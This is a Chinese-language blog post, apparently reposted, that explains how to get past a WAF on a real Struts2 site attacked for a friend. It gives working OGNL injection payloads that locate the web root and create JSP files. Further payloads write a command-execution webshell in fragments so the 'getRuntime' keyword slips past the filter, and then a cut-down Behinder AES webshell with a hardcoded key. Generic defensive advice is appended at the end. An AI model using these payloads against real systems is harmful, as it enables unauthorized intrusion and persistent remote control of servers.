请遵守法律法规，文章仅供安全防范与学习，严禁非法使用，后果自负。

继之前的Struts2绕过waf读写文件之后，遇到了一个实例，分享一下思路。

0x01 背景

朋友发来一个struts2有waf的站点，能检测到漏洞，但是命令执行不了，上传shell肯定也就不行了，估计是检测了关键字，直接开干

0x02 写命令执行马

一开始的思路是访问站点的jsp文件，比如http://xx.xxx/123.jsp测试有没有全局拦截，很显然，这里是没有的

直接可以进行写shell，先找绝对路径

0x001 查看web目录

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

这里web目录是/usr/local/tomcat/webapps/ROOT/，直接写个文件到/usr/local/tomcat/webapps/ROOT/3.jsp

0x002 创建文件

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp"),#bb0.flush(),#response.flush(),#response.close()}

0x003 写文件

这里写文件遇到了困难，原因在于出现了关键字getRuntime()，但是是可以绕过的，分批次进行写入文件，本地进行测试如下

package Struts2bypasswaf;  
  
import java.io.BufferedWriter;  
import java.io.IOException;  
  
/**  
 * @author f0ng  
 * @date 2022/5/24  
 */public class teststruts2 {  
    public static void main(String[] args) throws IOException {  
        BufferedWriter aaa = new java.io.BufferedWriter(new java.io.FileWriter("1.txt",true));  
        aaa.append("\"");  
        aaa.flush();  
        aaa.close();  
    }  
}

原始文件如下

执行Java代码后

可以发现双引号被追加写入了(这里为什么拎出来双引号，因为需要转义)

写文件分段1

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("<% java.io.InputStream in = Runtime.getRun"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

写文件分段2

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("time().exec(request.getParameter(\"pass\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}  %>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

0x004 执行命令

访问webshell即可

0x03 写入冰蝎马

这时候朋友又说了，这个webshell不可操作，他不喜欢

那么仿造之前的方法写个冰蝎给他不就行了，前面都是一样的，给出数据包

创建文件:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp"),#bb0.flush(),#response.flush(),#response.close()}

写入文件:

内容是

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp",true)),#bb0.append("<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

后面再写就发现出问题了，怎么都写不进去，但是一个一个字符是可以的，那么就可以单个字符进行追加写入；但是又遇到了一个问题，单个字符的{和}写不进去，原因暂不清楚，所以直接阉割了冰蝎马，后面为:

<% String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

去除了if (request.getMethod().equals("POST")){}注意要将%改为%25，要将"改为\""，转义

连接成功

0x04 总结

1. 对于通过http去写入特殊字符，要考虑URL编码以及转义的问题，如%变成了%25，"变成了\";
2. 运用到实战之前现在本地环境进行复现是很有必要的;
3. 文件落地比较麻烦，如果可以注入内存马那是比较方便的。

0x05 参考

https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ 【struts2绕过waf读写文件及另类方式执行命令】

https://github.com/vulhub/vulhub/tree/master/struts2/s2-016 【Struts2 016环境】

from https://mp.weixin.qq.com/s/31nUrF1v50-J2v6IOYzNYA

Struts2 是一个广泛使用的 Web 应用程序框架，但是由于其复杂的结构和高度可配置性，也存在一些安全风险，攻击者可以利用这些漏洞进行远程代码执行、文件读取等攻击。一些站点为了防御这些攻击，会使用 Web 应用程序防火墙（WAF）来进行防御。但是，WAF 并不能完全解决所有的安全问题，以下是一些建议：

1. 及时更新 Struts2 版本，确保漏洞得到及时修复。
2. 对用户输入的数据进行严格的校验和过滤，避免通过用户输入的数据构造恶意请求。
3. 启用安全的开发实践，如使用安全的密码存储和传输方案、使用 CSRF token 防范 CSRF 攻击等。
4. 配置正确的权限控制策略，限制用户访问敏感资源的权限。
5. 将应用程序部署在安全的环境中，如安全的操作系统、数据库等，避免因为操作系统或数据库的漏洞导致应用程序受到攻击。
6. 对系统日志进行监控，及时发现和响应异常请求和攻击行为。
7. 不要过分依赖 WAF，WAF 可以起到一定的防御作用，但并不能完全保证系统的安全，因此需要进行综合的安全风险评估和防范措施。

需要注意的是，以上建议只是一些基本的防范措施，对于特定的应用场景和攻击方式，可能需要针对性的防范措施。因此，在开发和部署应用程序时，还需要根据具体情况综合考虑各种安全风险，并采取相应的防范措施。